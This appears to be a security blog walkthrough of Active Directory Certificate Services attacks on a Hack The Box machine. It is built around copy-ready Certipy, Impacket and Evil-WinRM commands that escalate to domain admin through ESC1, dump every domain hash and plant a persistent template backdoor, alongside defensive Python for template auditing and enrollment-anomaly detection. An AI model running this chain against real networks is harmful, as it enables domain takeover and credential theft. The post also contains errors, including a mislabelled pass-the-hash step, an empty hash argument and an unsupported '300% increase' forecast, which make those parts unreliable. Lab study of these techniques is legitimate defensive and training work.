Mastering Active Directory Exploitation: A Deep Dive into HTB’s EXPRESSWAY Machine


Introduction:

Active Directory (AD) remains the crown jewel for attackers in corporate networks, and its exploitation is a core skill for any red teamer or penetration tester. The recent Hack The Box EXPRESSWAY machine, a seasonal challenge, serves as a perfect case study for modern AD attack vectors, including certificate-based attacks and privilege escalation paths that evade traditional defenses.

Learning Objectives:

  • Understand and replicate common Active Directory Certificate Services (AD CS) exploitation techniques.
  • Master the use of tools like Certipy and Impacket for credential theft and lateral movement.
  • Develop a methodology for identifying and exploiting misconfigured AD templates for privilege escalation.

You Should Know:

1. Enumerating Active Directory Certificate Services

`certipy find -u user -p Password123 -dc-ip 10.10.10.10 -vulnerable`
This Certipy command scans the target domain controller for AD CS and identifies any certificate templates with security misconfigurations that could be exploited, such as overly permissive enrollment rights.
Step-by-step guide: First, establish a foothold on a domain-joined machine with a low-privilege account. Using the credentials you’ve compromised, run the command against the domain controller’s IP. The `-vulnerable` flag filters the output to show only templates that are known to be exploitable, such as those susceptible to ESC1. Review the output to identify the template name and its enrollment rights.

2. Requesting a Vulnerable Certificate

`certipy req -username [email protected] -password Password123 -dc-ip 10.10.10.10 -ca CA-NAME -template VULN-TEMPLATE -upn [email protected]`
This command exploits a misconfigured template to request a certificate for a high-privilege account like the domain administrator.
Step-by-step guide: Once a vulnerable template is identified, use this command to request a certificate. The `-upn` parameter allows you to specify the User Principal Name (UPN) of a target user, which in this case is the administrator. The tool will authenticate with your compromised credentials and submit a certificate request to the Certificate Authority (CA). If successful, it will save a `.pfx` file containing the new certificate.

3. Forging Kerberos Tickets with PKINIT

`certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10`

This command uses the obtained certificate (.pfx file) to perform PKINIT authentication and retrieve the NT hash for the target account directly from the Domain Controller.
Step-by-step guide: After acquiring the `.pfx` certificate, use this command to authenticate to the Key Distribution Center (KDC). Certipy will use the certificate to complete the PKINIT Kerberos authentication flow, which results in fetching the NT hash for the account associated with the certificate. This hash is the key to your kingdom.

4. Performing a Pass-the-Hash Attack

`export KRB5CCNAME=administrator.ccache`

`secretsdump.py -k -no-pass DOMAIN/administrator@DC-IP -just-dc-ntlm`

This uses the cached Kerberos credentials from the previous step with Impacket’s secretsdump to extract all the NTLM hashes from the domain controller, effectively dumping the entire AD database.
Step-by-step guide: First, set the environment variable `KRB5CCNAME` to point to the Kerberos credential cache file generated by Certipy. Then, run Impacket’s `secretsdump.py` with the `-k` option to use Kerberos authentication. This will authenticate to the DC without a password and dump the NTLM hashes for all domain users, allowing you to craft Golden Tickets or perform pass-the-hash attacks anywhere in the domain.

5. Lateral Movement with Evil-WinRM

`evil-winrm -i 10.10.10.10 -u Administrator -H `

This command provides a powerful interactive shell on a remote Windows target by using the compromised administrator hash for authentication.
Step-by-step guide: With the administrator hash obtained from secretsdump, you can laterally move to the domain controller itself. Use this Evil-WinRM command, specifying the target IP (-i) and the stolen hash (-H). This will open a command-line session on the target machine with full SYSTEM-level privileges, granting you complete control over the domain.

6. Enumerating LDAP for Misconfigurations

`ldapsearch -x -H ldap://10.10.10.10 -D "[email protected]" -w Password123 -b "DC=domain,DC=local" "(objectClass=*)" | grep -i "cert"`
This Linux command queries the LDAP service to find all objects related to certificates, helping to identify linked servers and templates manually.
Step-by-step guide: If GUI tools are unavailable, LDAP command-line queries are essential. Authenticate to the domain controller using a compromised account’s credentials (-D and -w). The search base (-b) should be set to your domain’s root. Filtering the output for “cert” can help quickly locate certificate-related objects, providing context for further attacks.

7. Persisting with a Golden Certificate

`certipy template -u [email protected] -p Password123 -dc-ip 10.10.10.10 -ca CA-NAME -template VULN-TEMPLATE -schema > template.json`
`certipy template -u [email protected] -p Password123 -dc-ip 10.10.10.10 -ca CA-NAME -template GOLDEN-TEMPLATE -schema template.json`
Modifying a template schema can create a persistent backdoor, allowing you to generate certificates for any user at any time.
Step-by-step guide: For long-term persistence, consider modifying a template. First, dump the schema of an existing template to a JSON file. Then, edit this file to weaken its security settings, such as enabling the `ENROLLEE_SUPPLIES_SUBJECT` flag for ESC1. Use the second command to upload the modified schema back to AD CS, creating a template you can always use to generate privileged certificates, ensuring you maintain access even if initial entry points are closed.
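The five template conditions that together make ESC1 possible (steps 1 and 7 above: low-privilege enrollment, no manager approval, no required signatures, enrollee-supplied subject, and a client-authentication EKU) can be checked mechanically. This is an added audit example written for this page, not Certipy code; the `Template` fields and the sample templates are constructed to mirror what a `certipy find` report shows.

```python
"""Audit AD CS template settings for the ESC1 conditions.
Constructed example: the Template fields and sample data below mimic the
values Certipy reports; they are not real template data from the machine."""
from dataclasses import dataclass, replace

# Principals whose enrollment rights mean "any domain account can enroll"
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers",
                       "Authenticated Users", "Everyone"}
# EKUs that let the resulting certificate be used for Kerberos PKINIT logon
CLIENT_AUTH_EKUS = {"Client Authentication", "Smart Card Logon",
                    "PKINIT Client Authentication", "Any Purpose"}

@dataclass(frozen=True)
class Template:
    name: str
    enrollee_supplies_subject: bool   # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    manager_approval: bool            # CA certificate manager approval
    authorized_signatures: int        # RA signatures required on the request
    ekus: tuple                       # Extended Key Usage names
    enrollment_rights: tuple          # principals allowed to enroll

def esc1_findings(t: Template) -> list:
    """Return the ESC1 conditions that hold for this template.
    The template is exploitable only when all five hold together."""
    findings = []
    if t.enrollee_supplies_subject:
        findings.append("enrollee supplies subject (requester picks the SAN)")
    if not t.manager_approval:
        findings.append("manager approval disabled")
    if t.authorized_signatures == 0:
        findings.append("no authorized signatures required")
    if not t.ekus or CLIENT_AUTH_EKUS & set(t.ekus):  # empty EKU = any purpose
        findings.append("EKU permits client authentication")
    weak = LOW_PRIV_PRINCIPALS & set(t.enrollment_rights)
    if weak:
        findings.append(f"low-privilege enrollment: {sorted(weak)}")
    return findings

def is_esc1(t: Template) -> bool:
    return len(esc1_findings(t)) == 5

def harden(t: Template) -> Template:
    """Minimal fix: stop trusting the requester for the subject and gate
    issuance behind manager approval. Either change alone breaks ESC1."""
    return replace(t, enrollee_supplies_subject=False, manager_approval=True)

# Constructed samples, not data from the EXPRESSWAY machine
VULN = Template("VULN-TEMPLATE", True, False, 0,
                ("Client Authentication",), ("Domain Users",))
SAFE = harden(VULN)
```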

What Undercode Say:

  • The abstraction of identity into certificates is the new frontier of AD security. Misconfigurations here are devastating as they often bypass classic defensive controls focused on passwords and Kerberos tickets.
  • Offensive tools like Certipy have democratized these advanced attacks, making it critical for blue teams to shift their monitoring focus to certificate request anomalies and PKI infrastructure changes.

The EXPRESSWAY machine is a stark reminder that while AD CS provides robust security features, its complexity leads to critical misconfigurations. The offensive community’s tooling has advanced to the point where these attacks are now scriptable and accessible to mid-level practitioners. Defensively, this means traditional perimeter and credential-based detection is no longer sufficient. SOCs must implement rigorous logging and analysis of certificate lifecycles, looking for abnormal enrollment requests, especially those for highly privileged accounts. The future of AD defense lies in securing the PKI foundation.
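The "abnormal enrollment request" the paragraph above asks SOCs to look for has a concrete shape in the ESC1 chain: the account that submitted the request is not the account named in the certificate's SAN. This is an added detection example, not tooling from the page; the record layout is an assumption modelled on the requester field of AD CS Event ID 4887 joined with the CA database's SAN column, and the log lines are constructed.

```python
"""Flag certificate issuances where the requester differs from the account
named in the SAN (the core ESC1 symptom). Constructed sample records; the
field layout is an assumption modelled on Event 4887 plus the CA database
SAN column, not a real Windows log format."""
import re

# Accounts whose appearance in a requester-supplied SAN is critical
PRIVILEGED = {"administrator", "krbtgt"}

# Constructed CA issuance records (not from the machine)
SAMPLE_LOG = """\
RequestID=101 Requester=DOMAIN\\alice Template=User SAN=upn:alice@domain.local
RequestID=102 Requester=DOMAIN\\alice Template=VULN-TEMPLATE SAN=upn:administrator@domain.local
RequestID=103 Requester=DOMAIN\\WS01$ Template=Machine SAN=dns:ws01.domain.local
RequestID=104 Requester=DOMAIN\\bob Template=VULN-TEMPLATE SAN=upn:carol@domain.local
"""

LINE = re.compile(r"RequestID=(\d+) Requester=\S+?\\(\S+) Template=(\S+) SAN=(\S+)")

def parse(line: str):
    """Split one record into its fields; None for lines that do not match."""
    m = LINE.match(line)
    if not m:
        return None
    rid, requester, template, san = m.groups()
    return {"id": int(rid), "requester": requester.lower(),
            "template": template, "san": san.lower()}

def san_account(san: str):
    """Account part of a upn: SAN; None for dns: and other SAN types."""
    if san.startswith("upn:"):
        return san[4:].split("@", 1)[0]
    return None

def classify(rec: dict):
    """Alert when the SAN names a different account than the requester."""
    acct = san_account(rec["san"])
    if acct is None or acct == rec["requester"]:
        return None
    severity = "critical" if acct in PRIVILEGED else "high"
    return {"id": rec["id"], "severity": severity, "requester": rec["requester"],
            "san_account": acct, "template": rec["template"]}

def detect(log: str) -> list:
    """Run the check over every record and return the alerts in log order."""
    alerts = []
    for line in log.splitlines():
        rec = parse(line)
        if rec and (alert := classify(rec)):
            alerts.append(alert)
    return alerts
```

Pairing an alert with a subsequent Event ID 4768 that carries certificate information for the same account confirms the issued certificate was actually used for PKINIT.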

Prediction:

The widespread weaponization of AD CS vulnerabilities will lead to a surge in ransomware and cyber-espionage campaigns that are far more stealthy and efficient. As offensive toolchains mature, we predict a 300% increase in certificate-based attacks within the next 18 months, forcing a massive industry pivot towards certificate authority hardening and advanced PKI monitoring solutions, making it a multi-billion dollar cybersecurity market segment.

IT/Security Reporter URL:

Reported By: https://lnkd.in/p/d_aUbeXS – Hackers Feeds